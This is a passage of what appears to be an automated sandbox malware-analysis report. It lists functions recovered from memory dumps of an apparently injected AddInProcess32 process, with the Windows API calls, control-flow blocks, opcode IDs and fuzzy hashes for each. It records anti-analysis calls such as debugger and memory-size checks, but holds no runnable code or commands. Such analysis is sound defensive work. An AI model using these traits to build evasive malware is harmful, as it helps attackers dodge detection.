                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D02AE30B002089FDB55EF68D4907AEBBA6FF85300F54952AD406DB785DB75EC82CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06493916
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 06493953
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06493990
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 064939E9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                    • String ID: Xi
                                                                                                                                                                                                                                                    • API String ID: 2063062207-4233896261
                                                                                                                                                                                                                                                    • Opcode ID: a1746c3b1e3cc7dfbd67a9ac14ab649951fdbd7bc1b07f2f9d3f8e70965c219d
                                                                                                                                                                                                                                                    • Instruction ID: 91cdb1a67ce2b5b7a24c11b281f3f7eb3691ae2ea688f6545f4506179aed9c3b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1746c3b1e3cc7dfbd67a9ac14ab649951fdbd7bc1b07f2f9d3f8e70965c219d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C5144B09003099FDB55DFA9D948BEEBBF2EB49304F24801AE419AB350DB746984CB65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06493916
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 06493953
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06493990
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 064939E9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                    • String ID: Xi
                                                                                                                                                                                                                                                    • API String ID: 2063062207-4233896261
                                                                                                                                                                                                                                                    • Opcode ID: c3ce1508ee3500407cc23e87d09c0eea0beb483cbe6e841bc5ac603468e1c194
                                                                                                                                                                                                                                                    • Instruction ID: 0faef750e863c6af5bc01bbb5405b885c1d95b7a1b4bb59c4c732316ca38a018
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3ce1508ee3500407cc23e87d09c0eea0beb483cbe6e841bc5ac603468e1c194
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 105164B0D003099FDB54DFAAD948BAEBFF1EB49300F24801AE419AB350DB746984CB65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1364 649bd98-649bdb7 1366 649bdb9-649bdc6 call 649ad0c 1364->1366 1367 649bde3-649bde7 1364->1367 1372 649bdc8 1366->1372 1373 649bddc 1366->1373 1368 649bde9-649bdf3 1367->1368 1369 649bdfb-649be3c 1367->1369 1368->1369 1376 649be49-649be57 1369->1376 1377 649be3e-649be46 1369->1377 1421 649bdce call 649c040 1372->1421 1422 649bdce call 649c032 1372->1422 1373->1367 1379 649be59-649be5e 1376->1379 1380 649be7b-649be7d 1376->1380 1377->1376 1378 649bdd4-649bdd6 1378->1373 1381 649bf18-649bfd8 1378->1381 1383 649be69 1379->1383 1384 649be60-649be67 call 649ad18 1379->1384 1382 649be80-649be87 1380->1382 1416 649bfda-649bfdd 1381->1416 1417 649bfe0-649c00b GetModuleHandleW 1381->1417 1387 649be89-649be91 1382->1387 1388 649be94-649be9b 1382->1388 1386 649be6b-649be79 1383->1386 1384->1386 1386->1382 1387->1388 1390 649bea8-649beb1 call 64943fc 1388->1390 1391 649be9d-649bea5 1388->1391 1396 649bebe-649bec3 1390->1396 1397 649beb3-649bebb 1390->1397 1391->1390 1398 649bee1-649beee 1396->1398 1399 649bec5-649becc 1396->1399 1397->1396 1406 649bf11-649bf17 1398->1406 1407 649bef0-649bf0e 1398->1407 1399->1398 1401 649bece-649bede call 6498c84 call 649ad28 1399->1401 1401->1398 1407->1406 1416->1417 1418 649c00d-649c013 1417->1418 1419 649c014-649c028 1417->1419 1418->1419 1421->1378 1422->1378
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0649BFFE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                                                    • Opcode ID: 33d0420bd30b57a493633806448e329133bcb5c4bd41a2255c21145b605ba6dd
                                                                                                                                                                                                                                                    • Instruction ID: 74a35a2bb7cca10ed452b9cc7a1c777dbb82f9019c978ed19622d0975fa2c758
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33d0420bd30b57a493633806448e329133bcb5c4bd41a2255c21145b605ba6dd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05814470A00B058FDBA5DF2AE44475BBBF6FF88204F008A2AD496D7B40D775E945CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

• Graph image not rendered; entry block 11ef398-11ef3a3, GlobalMemoryStatusEx called in block 11ef457-11ef4e4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1482200127.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_11e0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 01ed59d6e6f36bc79c2650d92e80eb8efc8eba6efe12bc2a20c44446b31bb8d5
                                                                                                                                                                                                                                                    • Instruction ID: 6c3a79fc8133354d39f54efef3f32be77587d887d5a7df8ca05c5e6943864195
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01ed59d6e6f36bc79c2650d92e80eb8efc8eba6efe12bc2a20c44446b31bb8d5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF411472D043598FCB14DFA9D8447EEBBF1AF89210F18866BD808A7252DB749945CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

• Graph image not rendered; entry block 649df84-649dff6, CreateWindowExW called in block 649e053-649e0b2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0649E0A2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateWindow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                                                                                                                                    • Opcode ID: 1a60b4525af1384177853f591c6a70857456512d328248e79d279e41ed86cd19
                                                                                                                                                                                                                                                    • Instruction ID: 2fe794b1104d87a50702c619214f02da591dface132d19a7b9d762949d3cce78
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a60b4525af1384177853f591c6a70857456512d328248e79d279e41ed86cd19
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4151C0B1D003599FDF15CF99C884ADEBFB5BF49310F64812AE819AB250D7719885CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

• Graph image not rendered; entry block 649df90-649dff6, CreateWindowExW called in block 649e013-649e0b2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0649E0A2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateWindow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                                                                                                                                    • Opcode ID: f893d1babf5fad6038c8e7b69079fb3f4e0bcfc26e8ab3588c43cbbc45d5b8aa
                                                                                                                                                                                                                                                    • Instruction ID: cd2c8cf2aea41a5345389db6a3617116aceefe0901342859326b07bc07018d81
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f893d1babf5fad6038c8e7b69079fb3f4e0bcfc26e8ab3588c43cbbc45d5b8aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A941A0B1D003599FDF15CF99C884ADEBFB5BF49310F64812AE819AB210D7759845CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

• Graph image not rendered; entry block 11e70c1-11e714c calls CheckRemoteDebuggerPresent
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 011E713F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1482200127.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_11e0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662101638-0
                                                                                                                                                                                                                                                    • Opcode ID: e887fef2fa24cce6565b5463142d8d722f61ccbde6499ad0fadc373d58203e7f
                                                                                                                                                                                                                                                    • Instruction ID: e6276204eac09ac147323eebf5a4bcf62a88aa8eda8f3282e8e4428b316cf99d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e887fef2fa24cce6565b5463142d8d722f61ccbde6499ad0fadc373d58203e7f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 642169B18002598FDB14CFA9D584BEEBBF5AF49210F14845AE854A7350D378A944CF60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

• Graph image not rendered; entry block 6493ad8-6493b74 calls DuplicateHandle
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06493B67
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                                                                                                    • Opcode ID: a5a483bf0651f1f04bd20b2f563f5fc2b54f22fb00c39723fa54e4f47f604914
                                                                                                                                                                                                                                                    • Instruction ID: 7d93436928098caaacbb31b609568b69af13177c5fdb2d06b4dd0dcca8caa6a8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5a483bf0651f1f04bd20b2f563f5fc2b54f22fb00c39723fa54e4f47f604914
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E321E4B5D002089FDB10CFAAD884AEEBBF5EB48310F14801AE959A7350D374A940CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06493B67
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                                                                                                    • Opcode ID: 09008a84cf144a2503ab2633b0d7e111127e3c1f586c898f0a8b91cc9736d0f9
                                                                                                                                                                                                                                                    • Instruction ID: a805bda2042fdb2a8d9e5d80a6d5f492e9437202664c29bfe213adab45be8192
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09008a84cf144a2503ab2633b0d7e111127e3c1f586c898f0a8b91cc9736d0f9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E121E2B5D003089FDB10CFAAD884ADEBBF9EB48320F14801AE918A7350C374A940CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(00000000), ref: 011E88B8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1482200127.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_11e0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                                                                                    • Opcode ID: 67dec0eb0e850748d6ac560248b6f0ff72bbb482064681aa0fe6b7a128fdcaf8
                                                                                                                                                                                                                                                    • Instruction ID: d57425082b6eb817d3f1d5dc00874f7aeb96161355144526b15f76712bba34da
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67dec0eb0e850748d6ac560248b6f0ff72bbb482064681aa0fe6b7a128fdcaf8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 062147B1C006199BDB18CF9AD444BEEFBF4EB48310F14812AD918B7240D374A944CFE1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0649C079,00000800,00000000,00000000), ref: 0649C26A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                                                    • Opcode ID: b0a930fd689efc4a4dfe1d5d4bb369f635d60edb69ecc0cdfd75d880163baa38
                                                                                                                                                                                                                                                    • Instruction ID: 3a1fc9f8febd8f3ab166a33bc14a0d455af82a9c5ce869ddf07440e24e09636b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0a930fd689efc4a4dfe1d5d4bb369f635d60edb69ecc0cdfd75d880163baa38
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA1114B6D003099FDB14CFAAD844BEEFBF4EB88310F14852AE459A7200C775A545CFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(00000000), ref: 011E88B8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1482200127.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_11e0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                                                                                    • Opcode ID: 6b0bc74f31956808bf2bae97f891c0235b409695bbb048af5d0a55035596d7db
                                                                                                                                                                                                                                                    • Instruction ID: b73bb33aedcec7cbb7a9dd294aa321ec138e736840bcbbbdbea43fbe89b84144
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b0bc74f31956808bf2bae97f891c0235b409695bbb048af5d0a55035596d7db
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 772124B6C0061A9BDB14CF9AD544B9EFBF1EB08310F14812AD918B7340D338A944CFA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0649C079,00000800,00000000,00000000), ref: 0649C26A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                                                    • Opcode ID: d5a06eb2d18a48a1c5fcb89de75d027218cf087ec4d52e2572a0303cef365129
                                                                                                                                                                                                                                                    • Instruction ID: d883618607a0fa4a65e8e85a663a48b4c73ad68a6d289a76e033043b0bc1bb08
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5a06eb2d18a48a1c5fcb89de75d027218cf087ec4d52e2572a0303cef365129
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D1103B6D003098FDB20DF9AC484BDEFBF4EB48310F14842AE919A7200C375A545CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNELBASE ref: 011EF4D7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1482200127.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_11e0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1890195054-0
                                                                                                                                                                                                                                                    • Opcode ID: 75cfe51c4d38abfab23208826b8ddd53ea38798b513a38cda8125ffaee4a1c23
                                                                                                                                                                                                                                                    • Instruction ID: 6b6f67c5d11d4744fc15fa0379561ab523b7a4320cdc0c9608234d914ce2a667
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75cfe51c4d38abfab23208826b8ddd53ea38798b513a38cda8125ffaee4a1c23
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 961126B1C0065A9BDB14DF9AD444BDEFBF4EF48220F14812AE818B7240D378A945CFE1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0649BFFE
Memory Dump Source
• Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• OleInitialize.OLE32(00000000), ref: 069A330D
Memory Dump Source
• Source File: 0000001A.00000002.1517692334.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_69a0000_AddInProcess32.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• OleInitialize.OLE32(00000000), ref: 069A330D
Memory Dump Source
• Source File: 0000001A.00000002.1517692334.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_69a0000_AddInProcess32.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: h
• API String ID: 0-2439710439
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: |
• API String ID: 0-2343686810
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: |
• API String ID: 0-2343686810
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8a0b729a5f5020287fbafee847f68efdc67b872ea1ad25c71016940360c61e6d
                                                                                                                                                                                                                                                    • Instruction ID: 1bffdd338bcf9d5b08764429f1c1d4a2a3b6937810f790536e0eb987b5f2fa06
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a0b729a5f5020287fbafee847f68efdc67b872ea1ad25c71016940360c61e6d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3917170B102099FDB65EF69D8507AE77B6FF89300F14856AC509EB384EE34AD418BA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1cb37236dbe21aaf8e0af1369db205da6e4a3d7e878ff299421499fd843571dc
                                                                                                                                                                                                                                                    • Instruction ID: e32fe82edbaad62379bf9536e9b21c3e4b232361b043d1ed1405e11fe3d0e882
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cb37236dbe21aaf8e0af1369db205da6e4a3d7e878ff299421499fd843571dc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C561B471F001104FDF55AA6ECC806AFBAD7AFC5220B65443AD80ADB361DEB5ED0287E5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 940b2ec24655287ef7add8928df9e62467b3ed76ccf7b8030552cb5f01b5c3a9
                                                                                                                                                                                                                                                    • Instruction ID: e8e2e30c5fbdc0b3800d725b5e6433624a98442a236a67d8f6b513e80d7d033e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 940b2ec24655287ef7add8928df9e62467b3ed76ccf7b8030552cb5f01b5c3a9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27814C70B106099FDF55DFA8C4507AEBBE2BB89300F149529D50AEB389EF74DC428B51
